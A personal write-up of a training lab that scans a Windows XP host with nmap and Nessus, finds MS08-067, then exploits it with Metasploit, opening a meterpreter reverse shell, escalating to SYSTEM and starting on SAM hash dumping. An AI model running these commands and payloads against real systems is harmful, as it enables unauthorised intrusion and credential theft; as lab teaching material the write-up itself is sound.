Here in this lab we will be using the Nessus tool by tenable, to perform a vulnerability assessment and possibly exploiting the vulnerability.
Description
In this lab you will have to use and configure Nessus in order to perform a vulnerability scan against the target machine. However you are not told where the target machine is in the network. You only know it is in the same lab network you are connected to.
Goal
The goal of this lab is to learn how to properly configure Nessus depending on the services running on the target machine.
Since we do not have any information about our lab network and the hosts attached to it, the first step is to find our target!
Identify the target role
Now that we know there is a host on the target network, let us scan the host and gather as much information as we can in order to properly configure the Nessus scan.
Configure Nessus and run the scan
You should have identified few services running on the machine. Configure a new Nessus policy and scan depending on the scan results of the previous step.
Analyze and export the scan results
Once the scan completes, open the results and analyze them. You will find something very interesting! Moreover export the scan results, you may need them!
[OPTIONAL] Exploit the machine
The target machine has few critical vulnerabilities. Once you finish studying the Metasploit module, start the lab over again and try to exploit the machine.
Solutions
lets verify if we are connected to the enterprise environment. That can be checked by checking the ip address.
we now know that we are now connected to the network with ip 192.168.99.70/24.
so now i'll do a ping sweep to detect other devices that are present in the network
so, now we have a target lets try to gather information of the above ip from nmap so that we can configure rules in the nessus for further vulnerability assessment.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -O -A -p- 192.168.99.50 -vv
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 15:43 EDT
NSE: Loaded 154 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:43
Completed NSE at 15:43, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:43
Completed NSE at 15:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:43
Completed NSE at 15:43, 0.00s elapsed
Initiating ARP Ping Scan at 15:43
Scanning 192.168.99.50 [1 port]
Completed ARP Ping Scan at 15:43, 0.57s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:43
Completed Parallel DNS resolution of 1 host. at 15:43, 0.04s elapsed
Initiating SYN Stealth Scan at 15:43
Scanning 192.168.99.50 [65535 ports]
Discovered open port 139/tcp on 192.168.99.50
Discovered open port 135/tcp on 192.168.99.50
Discovered open port 445/tcp on 192.168.99.50
Increasing send delay for 192.168.99.50 from 0 to 5 due to 589 out of 1963 dropped probes since last increase.
SYN Stealth Scan Timing: About 4.56% done; ETC: 15:55 (0:10:49 remaining)
SYN Stealth Scan Timing: About 5.06% done; ETC: 16:04 (0:19:05 remaining)
SYN Stealth Scan Timing: About 5.52% done; ETC: 16:11 (0:25:56 remaining)
SYN Stealth Scan Timing: About 5.98% done; ETC: 16:17 (0:31:43 remaining)
SYN Stealth Scan Timing: About 6.44% done; ETC: 16:23 (0:36:35 remaining)
SYN Stealth Scan Timing: About 6.80% done; ETC: 16:28 (0:41:20 remaining)
SYN Stealth Scan Timing: About 7.14% done; ETC: 16:33 (0:45:43 remaining)
SYN Stealth Scan Timing: About 7.48% done; ETC: 16:37 (0:49:43 remaining)
SYN Stealth Scan Timing: About 7.76% done; ETC: 16:42 (0:53:39 remaining)
SYN Stealth Scan Timing: About 8.05% done; ETC: 16:46 (0:57:18 remaining)
SYN Stealth Scan Timing: About 8.32% done; ETC: 16:50 (1:00:49 remaining)
SYN Stealth Scan Timing: About 8.62% done; ETC: 16:54 (1:04:17 remaining)
SYN Stealth Scan Timing: About 8.95% done; ETC: 16:58 (1:07:51 remaining)
SYN Stealth Scan Timing: About 13.52% done; ETC: 16:58 (1:04:06 remaining)
SYN Stealth Scan Timing: About 16.37% done; ETC: 16:55 (1:00:07 remaining)
SYN Stealth Scan Timing: About 23.32% done; ETC: 16:57 (0:56:27 remaining)
SYN Stealth Scan Timing: About 28.84% done; ETC: 16:58 (0:52:44 remaining)
SYN Stealth Scan Timing: About 31.21% done; ETC: 16:55 (0:48:58 remaining)
Stats: 0:23:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 33.09% done; ETC: 16:53 (0:46:29 remaining)
Stats: 0:23:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 35.00% done; ETC: 16:52 (0:44:16 remaining)
SYN Stealth Scan Timing: About 38.19% done; ETC: 16:49 (0:40:45 remaining)
SYN Stealth Scan Timing: About 41.50% done; ETC: 16:47 (0:37:20 remaining)
SYN Stealth Scan Timing: About 45.09% done; ETC: 16:46 (0:34:08 remaining)
SYN Stealth Scan Timing: About 48.84% done; ETC: 16:44 (0:30:57 remaining)
SYN Stealth Scan Timing: About 52.66% done; ETC: 16:42 (0:27:54 remaining)
SYN Stealth Scan Timing: About 56.78% done; ETC: 16:41 (0:24:55 remaining)
SYN Stealth Scan Timing: About 61.14% done; ETC: 16:40 (0:22:01 remaining)
SYN Stealth Scan Timing: About 65.39% done; ETC: 16:39 (0:19:11 remaining)
SYN Stealth Scan Timing: About 69.96% done; ETC: 16:38 (0:16:22 remaining)
SYN Stealth Scan Timing: About 74.89% done; ETC: 16:37 (0:13:34 remaining)
SYN Stealth Scan Timing: About 79.84% done; ETC: 16:37 (0:10:47 remaining)
SYN Stealth Scan Timing: About 84.80% done; ETC: 16:37 (0:08:06 remaining)
SYN Stealth Scan Timing: About 89.77% done; ETC: 16:36 (0:05:24 remaining)
SYN Stealth Scan Timing: About 94.85% done; ETC: 16:36 (0:02:42 remaining)
Completed SYN Stealth Scan at 16:36, 3183.54s elapsed (65535 total ports)
Initiating Service scan at 16:36
Scanning 3 services on 192.168.99.50
Completed Service scan at 16:37, 8.12s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.99.50
Retrying OS detection (try #2) against 192.168.99.50
Retrying OS detection (try #3) against 192.168.99.50
Retrying OS detection (try #4) against 192.168.99.50
NSE: Script scanning 192.168.99.50.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:37
NSE Timing: About 99.76% done; ETC: 16:37 (0:00:00 remaining)
Completed NSE at 16:38, 53.78s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:38
Completed NSE at 16:38, 0.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:38
Completed NSE at 16:38, 0.00s elapsed
Nmap scan report for 192.168.99.50
Host is up, received arp-response (0.41s latency).
Scanned at 2021-08-19 15:43:54 EDT for 3260s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 128 Windows XP microsoft-ds
MAC Address: 00:50:56:A0:1A:8D (VMware)
OS fingerprint not ideal because: maxTimingRatio (1.468000e+00) is greater than 1.4
Aggressive OS guesses: Microsoft Windows XP SP3 (97%), Microsoft Windows XP SP2 or SP3, or Windows Embedded Standard 2009 (96%), Microsoft Windows XP SP2 or SP3 (96%), Microsoft Windows XP SP2 or SP3, or Windows Server 2003 (96%), Microsoft Windows XP Professional SP2 (96%), Microsoft Windows XP SP2 (96%), Microsoft Windows Mobile 6 (CE OS 5.0 - 5.2) (94%), Microsoft Windows Mobile 6.0 - 6.1 (94%), Microsoft Windows Server 2003 SP2 (94%), Microsoft Windows XP SP0 (94%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.91%E=4%D=8/19%OT=135%CT=1%CU=33613%PV=Y%DS=1%DC=D%G=N%M=005056%TM=611EC136%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=0)
OPS(O1=M4E7NW0NNT00NNS%O2=M4E7NW0NNT00NNS%O3=M4E7NW0NNT00%O4=M4E7NW0NNT00NNS%O5=M4E7NW0NNT00NNS%O6=M4E7NNT00NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)
ECN(R=Y%DF=Y%T=80%W=FFFF%O=M4E7NW0NNS%CC=N%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=FFFF%S=O%A=S+%F=AS%O=M4E7NW0NNT00NNS%RD=0%Q=)
T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=B0%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=S%T=80%CD=Z)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 3h30m28s, deviation: 4h57m00s, median: 27s
| nbstat: NetBIOS name: ELS-WINXP, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:a0:1a:8d (VMware)
| Names:
| ELS-WINXP<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| ELS-WINXP<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| Statistics:
| 00 50 56 a0 1a 8d 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 43397/tcp): CLEAN (Couldn't connect)
| Check 2 (port 52653/tcp): CLEAN (Couldn't connect)
| Check 3 (port 17687/udp): CLEAN (Failed to receive data)
| Check 4 (port 33047/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: els-winxp
| NetBIOS computer name: ELS-WINXP\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-08-19T13:37:50-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 408.72 ms 192.168.99.50
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:38
Completed NSE at 16:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:38
Completed NSE at 16:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:38
Completed NSE at 16:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3263.51 seconds
Raw packets sent: 72684 (3.201MB) | Rcvd: 69224 (2.782MB)
┌──(kali㉿kali)-[~]
└─$
Looking at the output from the nmap, we can detect that the os that is running is windows. So, now we can go ahead and configure the nessus custom rules for scanning the windows os.
Assuming that the nessus is already installed in the system, i am proceeding with running the scans.
in order to start nessus we can either start from the Applications or u can run the following in a terminal.
systemctl start nessusd
that command should start the nessus in the system and then go ahead to browser and visit https://127.0.0.1:8834/ this should show a nessus login screen.
we should navigate to Scans and choose New Scan -> Advanced scan.
We only need to specify the target and the desired name of the scan. Now, we are ready to launch the scan.
Policy -> New Policy -> Advanced Scan and configure the below.
Then navigate to My Scans -> New Scan -> User Defined and launch the scan.
Analyze and export the scan results
From the scan results obtained in the previous step we can see that the machine has some critical vulnerabilities.
The most interesting one is the MS08-067:
This vulnerability allows attackers to execute code remotely! Keep it in mind if you want to exploit the machine!
This completes the lab, if interested on how to exploit the machine u can proceed further. This may be a little advanced for newbies.
Exploitation
So, now i have the vulnerability that allows me to attack the machine, so lets go ahead and try to attack the machine using Metasploit.
so Metasploit is a tool from rapid7 it helps in automating the payloads and in attacking. You can read more on that in Google.
so inorder to start metasploit we should use the command
msfconsole (-q switch is optional, i use it as it helps me save the time)
i went and searched for the ms08-067 exploit and found a search result for that.
use the exploit and set the required fields as shown below
msf5 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.101.14 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.99.50
RHOSTS => 192.168.99.50
msf5 exploit(windows/smb/ms08_067_netapi) > set LhOST 192.168.99.70
LhOST => 192.168.99.70
msf5 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.99.50 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.99.70 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf5 exploit(windows/smb/ms08_067_netapi) >
its time to run the exploit so
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.99.70:4444
[*] 192.168.99.50:445 - Automatically detecting the target...
[*] 192.168.99.50:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.99.50:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.99.50:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176195 bytes) to 192.168.99.50
[*] Meterpreter session 1 opened (192.168.99.70:4444 -> 192.168.99.50:1031) at 2021-08-19 16:17:03 -0400
meterpreter >
meterpreter > sysinfo
Computer : ELS-WINXP
OS : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
as you can see we are in the windows system, now lets check the ip address of the system.
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 00:50:56:a0:1a:8d
MTU : 1500
IPv4 Address : 192.168.99.50
IPv4 Netmask : 255.255.255.0
meterpreter >
Privilege Escalation
after that we escalated our role to the system.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Yay!!!! we have successfully exploited the windows system!!!
{BONUS} Hashdump & Cracking
Now lets get the SAM table entries form the system and crack the hashes
If you are wondering what SAM table is, it is a place where all the account usernames and passwords are stored. It stands for Security Account Manager.
